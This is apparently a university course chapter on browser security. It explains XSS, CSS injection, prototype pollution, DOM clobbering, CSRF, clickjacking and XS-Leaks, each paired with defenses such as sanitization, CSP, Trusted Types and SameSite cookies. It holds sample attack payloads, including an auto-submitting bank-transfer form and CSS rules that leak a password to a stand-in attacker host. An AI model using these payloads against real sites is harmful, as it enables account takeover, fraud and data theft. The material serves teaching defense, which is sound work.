Web Browser

Web Browser#

Let’s cover some of the attacks and defenses that make up the security landscape inside the web browser — the WWW client.

Browser threat model (almost a refresher)#

Browsers load websites over HTTP. Websites are made out of HTML, CSS, and JavaScript1.

Out of those three, JavaScript is the most interesting, because it’s a programming language from which you have access to anything, from the perspective of the website. The browser has security boundaries between the websites following the Same Origin Policy — triplet of protocol (https), host (kam.mff.cuni.cz), and port (433), meaning JavaScript on https://evil.com can’t access cookies, or documents for https://internet-banking.com.

So, the ultimate goal of an attacker is to somehow execute JavaScript in https://internet-banking.com’s context anyway, usually by abusing some vulnerability in the target website. Or if they can’t do that, well then it might be nice to at least leak some data from that site.

Even just a leak allowing JavaScript running at https://evil.com to see whether the browser is signed in as a specific user on https://social-network.com, might be a valid security issue.

Sites#

Although origin is the main security-barrier marker, there are things in browsers which have looser access control than that, based on sites. For example, authorization.cuni.cz is allowed to store cookies accessible by the whole *.cuni.cz (where * is any other domain), by setting cuni.cz as the domain on the specific cookies it wants to share. cuni.cz is the site of authorization.cuni.cz, but also of a.cuni.cz, b.cuni.cz, etc. However, it cannot set cookies with domain muni.cz, as that could be potentially dangerous2.

Pages that share a site, like all the ones on cuni.cz, are considered “friendly”, the level of isolation between them is weaker and some mitigations don’t apply between them.

How do you tell if two pages are same site? Two hosts belong to the same site, if they share the same registrable domain. Registrable domain is the eTLD (effective top-level domain) + 1 domain on top of that. Domain names like cuni.cz (cz is TLD, cuni is +1) or sijisu.eu are registrable domains.

However, consider Github Pages, where you get YOUR_USERNAME.github.io domain for your website. This would mean, unrelated and untrusted people would share a site (github.io), and thus have a weaker security boundary. To fix this, eTLDs are defined in a openly accessible public suffix list, where anyone can add and that the browsers use to determine registrable domains. And indeed, github.io is present there:

// GitHub, Inc.
// Submitted by Patrick Toomey <security@github.com>
github.app
githubusercontent.com
githubpreview.dev
github.io

Let’s see if you can find out which .cz domains are eTLDs.

Attack: Cross Site Scripting — XSS#

Cross Site Scripting (XSS, because CSS was taken by CSS stylesheets) is more the final effect, than a specific vulnerability. It is the ability to force a website to execute attacker-controlled JavaScript, or more generally execute JavaScript in the security context of another site/origin. There are few principally different ways, how this is achieved, but the most common one is some type of injection.

Reflected XSS#

Consider the following web app:

@app.route("/greet")
def greet():
    name = request.args.get('name', 'World')
    return f"<h1>Hello, {name}!</h1>"

If we make a request to /greet?name=Pitfalls, we are greeted with Hello, Pitfalls!.

But what if we try to inject HTML, and with that JavaScript?

If we make a request to /greet?name=<script>alert(window.origin)</script>, the final content of the page which is sent to the web browser is this:

<h1>Hello, <script>alert(window.origin)</script>!</h1>

The browser cannot tell the difference between the user-provided string, and the rest of the HTML page, so it will execute the JavaScript!

alert() is a function that displays a browser popup with provided content.

Injections like this can be present not only in plain HTML, like in this case, but also in HTML attributes, like:

<input name="username" value="INJECTION">

If we substitute "><script>alert("pwned")</script> as the INJECTION we get:

<input name="username" value=""><script>alert("pwned")</script>">

Defense: Sanitization#

To mitigate reflected XSS developers need to properly escape the user-controlled parts of the content. Sanitization can be done by HTML encoding the < and > characters, as well as the ", ', and & characters, before displaying them on the page.

< becomes &lt;
> becomes &gt;
" becomes &quot;
' becomes &apos;
& becomes &amp;

Many frameworks and templating libraries, such as Jinja2 in Flask, do this automatically. But it’s wise to check, that they are really doing it properly :)

After escaping, the examples above become harmless:

<h1>Hello, &lt;script&gt;alert(window.origin)&lt;/script&gt;!</h1>
<input name="username" value="&quot;&gt;&lt;script&gt;alert(&quot;pwned&quot;)&lt;/script&gt;">

Stored XSS#

This follows the same principle as reflected XSS, but it has bigger impact. In stored XSS, the attacker’s payload is stored persistently (e.g., in the database) and triggered every time someone sees the exploit’s payload.

A good example of this type of attack is the 2014 TweetDeck XSS worm:

Original Tweet

A stored XSS vulnerability in TweetDeck — a Twitter (now X) client — allowed for the payload to execute. The payload auto-clicked the retweet button on the tweet itself, making it spread. Before TweetDeck fixed the vulnerability, it got over 80k retweets.

Or the 2005 MySpace XSS worm, which ended with an arrest.

The same sanitization techniques also apply here.

DOM-based#

XSS can be also present in contexts other than the browser directly rendering content sent from the server.

Nowadays, websites fetch content using APIs and then render the content dynamically.

There are number of ways to do that, some are vulnerable to XSS — they are XSS sinks.

The OG way for a dynamic content update is the document.write function, which will write the argument to the document’s body and reparse it:

document.write('This is <script>...</script>')

The commonly used way now is the innerHTML property, which will set the child tree of an HTML node to a new value parsed out of the string:

document.body.innerHTML = "This is HTML <i>and there can be injections</i>";

Even though <script> tags added by innerHTML don’t execute, we can execute JS anyway, using one of the many on* handlers, like:

document.body.innerHTML = "<img src=\"nonexistent.png\" onerror=\"alert(window.origin)\">";

The image content will fail to load and the onerror handler will run, executing alert(window.origin).

Other XSS sinks include the eval function — allowing for evaluation of JavaScript dynamically, and believe it or not also the window.location property, which can be used to redirect users to a new location using JavaScript. But browsers, for historical reasons, support the javascript scheme, which can be used to execute JavaScript in the current context:

window.location = "javascript:alert(window.origin)"

This will again trigger a popup.

Defense: Sanitization#

Instead of innerHTML developers should use innerText and createElement to avoid reparsing HTML where possible, or employ escaping, similarly to the above case of reflected XSS.

Of course, nowadays, lot of web applications use frontend frameworks, that usually do things securely when used properly, but it’s not wise to trust them entirely. And it’s advisable to take special care on features that are custom. For example, URL parameter parsing and handling is a common culprit.

There are cases, where some form of HTML formatting is desirable, but XSS is still unwanted. Take a blogging platform, where users post their blogposts and want to add formatting, images etc.

For this a semantics-aware sanitization can be done, and all dangerous content removed from the HTML, while keeping the harmless parts. Maybe a counterintuitive best-practice for this process is to do this sanitization directly in the web browser. Because HTML is very complex, parser differentials are a common occurrence. Doing the sanitization in the browser means the browser’s HTML parser will be used and, in the ideal case, this will eliminate all parsing inconsistencies and produce a truly safe HTML3.

There is a push to add a standardized API to browsers to do this, but in the meantime the DOMPurify library is an industry standard to achieve HTML sanitization.

Dirty, before sanitization:

<b>This will stay here</b>

<script>hahaha</script>
<img src="nonexistent.png" onerror="alert()">

Clean, after DOMPurify sanitization (DOMPurify.sanitize(dirty)):

<b>This will stay here</b>


<img src="nonexistent.png">

You can play around with it!

DOM vulnerabilities: Bonus round#

Here are a few extra techniques. They show that even when you cannot directly inject JS into the page, bad things can still happen under the right conditions. Feel free to skip this section and continue with “Defense: Content Security Policy”.

Attack: CSS injection#

CSS injection can be used to exfiltrate data from pages, even when JavaScript execution is not possible. While CSS cannot execute code, it can be used to selectively load external resources based on page content.

Consider a scenario where an attacker can inject CSS into a page (perhaps through a style attribute or a CSS file). They can use CSS selectors to target specific content and trigger HTTP requests:

input[name="password"][value^="a"] {
    background: url("https://evil.com/leak?token=a");
}
input[name="password"][value^="b"] {
    background: url("https://evil.com/leak?token=b");
}
/* ... and so on for each character */

This CSS will make the browser send a request to the attacker’s server only when the password starts with a specific character. By iterating through all possible characters, an attacker can reconstruct the entire password character by character.

Attack: Prototype Pollution#

Prototype pollution is a JavaScript-specific vulnerability that occurs when processing JSON objects (or even other structures) and recursively merging them.

In JavaScript, everything is an Object. All objects are created from a single prototype, and if you set a property on the prototype, all descendants inherit it.

Consider an application that recursively merges user-provided JSON data with an existing object:

function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}

let settings = {darkmode: true};
let parsedUserInput = JSON.parse(userInput);
merge(settings, parsedUserInput);

An attacker can exploit this by injecting __proto__ (or constructor.prototype) into their JSON payload:

{
    "__proto__": {
        "admin": true
    }
}

After the recursive merge, the admin property is added to Object.prototype, meaning all objects in the application will now have admin: true:

if (user.admin) {
    eval(userProvidedCode); // Oops! This now executes for everyone
}

The main mitigation is to avoid using JS objects for dictionaries — modern JS has the Map built-in type. If you really need objects, use Object.create(null), avoid recursive merging of untrusted data, or use libraries that specifically check for prototype pollution (and keep them updated!).

Note: this affects pretty much all prototype based languages in some form, including on the server.

Attack: DOM clobbering#

DOM clobbering is a technique that exploits how browsers historically create global JavaScript objects for certain HTML elements with id or name attributes.

For historical reasons, when an HTML element has an id attribute, the browser automatically creates a global JavaScript variable with that name, referencing the element:

<a id="debug"></a>
<script>
    console.log(window.debug); // Logs the <a> element
</script>

This behavior can be exploited when JavaScript code uses possibly undefined global variables without properly validating their type. Consider this vulnerable code:

<script>
    if (window.debug !== undefined) {
        eval(debug.cmd);
    }
</script>

The developer might have intended debug to be a conditionally inserted configuration object with a cmd property. However, an attacker can inject HTML to clobber the debug variable (notice, this is just HTML, no JavaScript, so this can bypass various filters):

<a id="debug"></a>
<a id="debug" name="cmd" href="javascript:alert(1)"></a>

When multiple elements share the same id, the browser creates an HTMLCollection. The second element with name="cmd" becomes accessible via debug.cmd. Since anchor elements’ href attribute can be accessed as a string, eval(debug.cmd) will execute the JavaScript in the href!

Mitigation#

To prevent DOM clobbering:

  • Avoid checking global variables directly; use namespacing or modules
  • When necessary, use strict checking, including types: if (window.debug && typeof debug.cmd === 'string')

Defense: Content Security Policy#

Content Security Policy (CSP) is a browser security mechanism designed to control which resources a web page can load and execute. It was originally developed to mitigate content injection vulnerabilities like XSS, but nowadays it serves many different purposes:

  • Restricting which scripts, styles, images, and other resources can be loaded
  • Controlling framing capabilities — control who can iframe your page
  • Blocking mixed content (HTTP resources on HTTPS pages)
  • Restricting targets of form submissions
  • Restricting navigations

The CSP is sent by the server via the Content-Security-Policy HTTP header and is enforced by the browser.

How CSP works#

CSP uses directives to specify allowlists of permitted sources (what is not allowed, is disallowed) for different resource types. Here are some key directives:

script-src — controls which sources can load JavaScript:

Content-Security-Policy: script-src https://trusted.com

This would only allow scripts from https://trusted.com to execute. Scripts from any other origin, or inline scripts, would be blocked.

You can use various source expressions:

  • Specific URLs: script-src https://example.com
  • 'unsafe-inline' — allows inline <script> tags and event handlers (defeats XSS protection!)
  • 'unsafe-eval' — allows eval() and similar dynamic code evaluation
  • 'nonce-RANDOM' — allows scripts with a matching nonce attribute: <script nonce="RANDOM">...</script>
  • 'sha256-HASH' — allows scripts whose content matches the specified hash

For example:

Content-Security-Policy: script-src 'nonce-aaaaaaaa'

Then in the HTML:

<script nonce="aaaaaaaa">
    // This script will execute
</script>

<script>
    // This script will be blocked, no XSS \o/
</script>

The nonce should be randomly generated for each page load and unpredictable to attackers.

The 'strict-dynamic' keyword is particularly interesting — it allows scripts that were loaded by already-trusted scripts to also be trusted, propagating trust dynamically. This makes CSP more compatible with modern JavaScript frameworks.

style-src — similar to script-src, but for CSS stylesheets.

default-src — fallback for any resource types not explicitly specified. If you set default-src 'self', all resources must come from the same origin unless overridden by more specific directives.

report-uri (or the newer report-to) — specifies where the browser should send reports when CSP violations occur. This is useful for detecting attacks or debugging CSP misconfigurations:

Content-Security-Policy: script-src 'self'; report-uri /csp-violations

Example policy#

A strict CSP policy might look like:

Content-Security-Policy:
    default-src 'none';
    script-src 'nonce-RANDOM' 'strict-dynamic';
    style-src 'self';
    img-src 'self' https:;
    report-uri /csp-report

This policy:

  • Blocks everything by default
  • Only allows scripts with the correct nonce (and scripts they load)
  • Allows styles from same origin
  • Allows images from same origin or any HTTPS source
  • Reports violations to /csp-report

When using CSP, here are some best practices to follow:

Disable iframing if you don’t need it. If your website isn’t meant to be embedded in iframes, you should explicitly prevent it. This protects against clickjacking attacks, where an attacker overlays your page in an invisible iframe and tricks users into clicking things they didn’t intend to.

For example, imagine an attacker creates evil.com with:

<iframe src="https://internet-banking.com/transfer" style="opacity: 0.0001; position: absolute; top: 0; left: 0;"></iframe>
<button style="position: absolute; top: 200px; left: 300px;">Click here for free money!</button>

See it here in action with increased transparency for it to be visible — notice you are interacting with the background page when you want to click the button:

The victim thinks they’re clicking the attacker’s button, but they’re actually clicking the “Confirm Transfer” button on the nearly-invisible banking iframe underneath. This is called “Clickjacking”.

To prevent this, use the frame-ancestors directive:

Content-Security-Policy: frame-ancestors 'none'

This completely prevents your page from being embedded in any iframe. If you need to allow specific sites to iframe your page, you can whitelist them:

Content-Security-Policy: frame-ancestors 'self' https://trusted-partner.com

Alternatively, you can use the older X-Frame-Options header, which has broader browser support but is less flexible:

X-Frame-Options: DENY

or

X-Frame-Options: SAMEORIGIN

Disable everything that you don’t need. Because it won’t hurt you. Content-Security-Policy: default-src 'self' is a good starting point.

Use CSP Evaluator to check your policy. Google provides a helpful tool at https://csp-evaluator.withgoogle.com/ that analyzes your CSP and highlights potential weaknesses or bypasses.

Limitations and bypasses#

While CSP is a powerful defense-in-depth mechanism, it’s not a silver bullet.

It requires careful configuration and can break legitimate functionality. Without configuration, CSP of 'unsafe-inline' and 'unsafe-eval' significantly weakens protection (so do not use those keywords when possible).

Also, while some script sources might appear trusted, they can me malicious.

For example, the policy of:

Content-Security-Policy: script-src https://google.com

This might appear legit, before you learn that google.com hosts various APIs and JavaScript libraries, including Google’s search suggestion API supporting JSONP (JSON with Padding). JSONP is a technique of wrapping data with a JS function call, used back in the day to fetch data cross origin (now different, better methods are available, please don’t use it).

JSONP allows specifying a callback function, so when we query:

https://www.google.com/complete/search?client=chrome&q=1&jsonp=alert(1)//

We get this response:

alert(1)//(["1",["1001 her","1. ...

When this is loaded as a script, it will execute alert(1), effectively giving an attacker arbitrary JavaScript execution despite the seemingly trusted domain!

This is why even seemingly trusted domains can be dangerous in CSP. The attacker doesn’t need to compromise Google — they just need to find an endpoint that reflects user input in executable JavaScript, or directly host their script.

Trusted Types#

Trusted Types is a browser API that works together with CSP to prevent DOM-based XSS vulnerabilities at their direct triggers — the dangerous sinks.

When Trusted Types are enabled via CSP, dangerous DOM APIs (like innerHTML, eval, document.write, etc.) will only accept special Trusted Type objects instead of raw strings. Any attempt to pass a regular string to these sinks will throw an exception.

First, enable Trusted Types via CSP:

Content-Security-Policy: require-trusted-types-for 'script'; trusted-types myPolicy;

Now, attempting to use a dangerous sink with a string will fail:

// This will throw an error!
document.body.innerHTML = "<div>Hello</div>";

To use these sinks, you must create Trusted Types through policies:

// Create a policy
const policy = trustedTypes.createPolicy('myPolicy', {
    createHTML: (string) => {
        // Sanitize the string here
        return DOMPurify.sanitize(string);
    }
});

// Now this works
const trusted = policy.createHTML("<div>Hello</div>");
document.body.innerHTML = trusted;

The key insight is that sanitization logic is centralized in the policy. Instead of developers remembering to sanitize at every sink usage, they must go through a policy that enforces sanitization.

Attack: Cross Site Request Forgery — CSRF#

Cross-Site Request Forgery (CSRF) is a vulnerability where an attacker tricks a victim’s browser into making unwanted requests to a website where the victim is authenticated. This works because for historical reasons browsers automatically attach cookies to requests, even when those requests originate from a different site.

Consider https://internet-banking.com with an API endpoint to transfer money:

POST /api/transfer
amount=1000&to=attacker_account

If the victim is logged into their bank account, their session cookie is stored in the browser. Now, when the browser makes a request to internet-banking.com, it automatically includes the session cookie — even if that request originates from evil.com.

This is might be useful for legitimate cross-site scenarios, like putting a form on your site that submits the data to some unified form processor — like a forum, but it opens the door to CSRF attacks.

Attack flow#

  1. The victim is authenticated on internet-banking.com (they have a valid session cookie)
  2. The victim visits the attacker’s website at evil.com
  3. The page at evil.com contains an HTML form that’s prefilled with a malicious request:
<form id="csrf-form" action="https://internet-banking.com/api/transfer" method="POST">
    <input type="hidden" name="amount" value="1000">
    <input type="hidden" name="to" value="attacker_account">
</form>
<script>
    document.getElementById('csrf-form').submit();
</script>
  1. The form is automatically submitted via JavaScript without the user realizing
  2. The victim’s session cookie for internet-banking.com is automatically attached to the outgoing POST request
  3. The bank’s server sees a valid session cookie and processes the transfer — the unwanted money transfer succeeds

The victim never intended to make this transfer, but from the server’s perspective, it looks like a legitimate request from an authenticated user.

Defense: SameSite cookies#

The SameSite cookie attribute tells browsers when to include cookies in cross-site requests. When setting a cookie, the server can specify:

Set-Cookie: session=abc123; SameSite=Strict

There are three possible values:

  • SameSite=Strict — The cookie is only sent in requests that originate from the same site. This provides the strongest CSRF protection, but can break legitimate flows — like following a link from an email — the user won’t be authenticated, but for APIs this is ideal.
  • SameSite=Lax (now the default in modern browsers) — The cookie is sent in top-level navigations (like clicking a link), but not in cross-site subrequests (like forms, fetch requests, or images). This balances security and usability.
  • SameSite=None — The cookie is sent in all cross-site requests. This is the old default behavior and requires the Secure attribute.

With SameSite=Strict or SameSite=Lax, the CSRF attack described above would fail — the session cookie wouldn’t be attached to the cross-site POST request from evil.com.

Limitations and bypasses#

Lax mode has exceptions, as some browsers temporarily send cookies in all contexts for the first 2 minutes after they’re set. This is to support certain authentication flows that rely on cross-site POST requests, but it creates a window of possible vulnerability.

SameSite only protects against cross-site attacks, not cross-origin attacks. If an attacker controls evil.example.com, they can still forge requests to bank.example.com (same site: example.com), this is called Cross-Origin Request Forgery (CORF), and only raises the importance of keeping only trusted pages on your site.

Defense: CSRF tokens#

Because of the limitations of SameSite cookies, CSRF tokens remain an important defense mechanism. The idea is simple: include an unpredictable secret value in each form that modifies state, and verify it on the server.

Here’s how it works:

  1. When the server renders a form, it generates a random token and includes it in a hidden field:
<form action="/api/transfer" method="POST">
    <input type="hidden" name="csrf_token" value="random_unguessable_value_filled_in_by_server">
    <input type="text" name="amount">
    <input type="text" name="to">
    <button type="submit">Transfer</button>
</form>
  1. The server also stores this token in the user’s session (or in another cookie).
  2. When the form is submitted, the server checks that the token in the request matches the one in the session.
  3. If the tokens don’t match, or if the token is missing, the request is rejected.

An attacker on evil.com can forge a request, but they can’t include the correct CSRF token because they don’t know its value — it’s unique to each user session and unpredictable.

Additional best practices#

While SameSite cookies and CSRF tokens are the main way of defending against CSRF, there are some additional best practices:

  • ALWAYS use POST, PUT, DELETE for state-changing operations. Never use GET for endpoints that change state. Doing so violates the HTTP standard, breaks pre-fetching, and an attacker can just do <img src="https://internet-banking.com/api/transfer?to=attacker">.
  • Consider Authorization or custom headers when building an API that you know you will be only calling from JS.

Attack: XS-Leaks#

Cross-Site Leaks (XS-Leaks) are a class of vulnerabilities that exploit side-channels in web browsers to leak information across origins, even when the Same Origin Policy (SOP) is in place. Unlike XSS or CSRF, XS-Leaks don’t require executing code on the target origin or making unauthorized requests — instead, they infer information by observing indirect side channels.

Even though SOP prevents direct access to cross-origin resources, certain information is still observable: the number of frames in a window, loading events, error events, timing information, and more. Many of these need to be kept that way for compatibility.

Consider a social network at social-network.com with a search feature. When you search for a user, the page takes longer to load if there are many results, and loads quickly if there are no results.

An attacker on evil.com can exploit this timing difference to determine if a specific user exists in the victim’s friend list:

<iframe src="https://social-network.com/direct-messages/search?q=My phone number is +4201*"></iframe>
<iframe src="https://social-network.com/direct-messages/search?q=My phone number is +4202*"></iframe>
<iframe src="https://social-network.com/direct-messages/search?q=My phone number is +4203*"></iframe>

The attacker measures how long each iframe takes to load:

  • https://social-network.com/direct-messages/search?q=My phone number is +4201* ❌ fast (no results)
  • https://social-network.com/direct-messages/search?q=My phone number is +4202* ❌ fast (no results)
  • https://social-network.com/direct-messages/search?q=My phone number is +4203* ✅ slooooow (many results!)

By observing the timing, the attacker learns that the victim has likely a phone number starting with a 3.

There are many other techniques we invite you to check out.

Defending against XS-Leaks is hard#

XS-Leaks are notoriously difficult to defend against. There are countless possible attack vectors already, new techniques are discovered regularly, and the web platform’s complexity means there are still many other potential side-channels.

Although some defenses exist, like Cross-Origin-Opener-Policy (COOP) or Cross-Origin-Resource-Policy (CORP) they are often opt-in and still incomplete anyway (or not even supported by browsers yet).

The difficulty is so significant that even big companies don’t accept reports of bugs for this class of vulnerabilities, despite their potential impact on user privacy. For example, Google, has only recently started rolling out fixes and started again accepting XS-Leak bugs in their bug bounty program, despite that some of the first XS-Leaks vulnerabilities were reported back in 2019.

The fundamental issue is that the Web platform is insecure by default. It was designed with openness and interoperability for content sharing in mind, not security for an application platform. Shifting towards secure defaults is a long process that requires breaking backward compatibility — something the web is historically reluctant to do.

TLDR#

  • Cross-Site Scripting (XSS) allows attackers to execute JavaScript on a target website by injecting malicious code:
    • XSS comes in three main forms: Reflected (user input immediately reflected in response), Stored (malicious payload persisted in database and executed on view), and DOM-based (client-side JavaScript unsafely handles input using dangerous sinks like innerHTML, eval, or document.write).
    • Defense: Sanitize and escape user input by encoding special characters (<, >, ", ', &). Use safe APIs like innerText instead of innerHTML. For rich content, use browser-based sanitization libraries like DOMPurify.
  • Content Security Policy (CSP) is a browser security mechanism that controls which resources a page can load:
    • Sent via HTTP header and enforced by the browser.
    • Use directives like script-src, style-src, default-src to allowlist permitted sources.
    • Use nonces ('nonce-RANDOM') or hashes to allow specific inline scripts while blocking injected ones.
    • frame-ancestors directive prevents clickjacking by controlling who can iframe your page.
    • Trusted Types work with CSP to prevent DOM XSS by requiring dangerous sinks to only accept special Trusted Type objects, centralizing sanitization logic.
  • Cross-Site Request Forgery (CSRF) tricks a victim’s browser into making unwanted authenticated requests to another site:
    • Exploits the fact that browsers automatically attach cookies to requests, even from different origins.
    • Defense with SameSite cookies: Set SameSite=Strict or SameSite=Lax to control when cookies are sent in cross-site requests (Lax is now the default).
    • Defense with CSRF tokens: Include unpredictable tokens in forms and verify them server-side.
    • Always use POST/PUT/DELETE for state-changing operations, never GET.
  • Cross-Site Leaks (XS-Leaks) exploit side-channels to leak information across origins without violating Same Origin Policy:
    • Attackers observe timing differences, loading events, or other indirect signals to infer sensitive information.
    • Example: XS-Search measures how long a search takes to determine if results exist.
    • Very difficult to defend against due to web platform’s design for openness over security.

Further resources#


  1. And possibly many other things, like WebAssembly. ↩︎

  2. Well, if you have evil.cuni.cz controlled by a potential attacker, this is dangerous too. See Cookie Tossing and please never set the domain attribute manually. ↩︎

  3. Of course, we live in a non-ideal world↩︎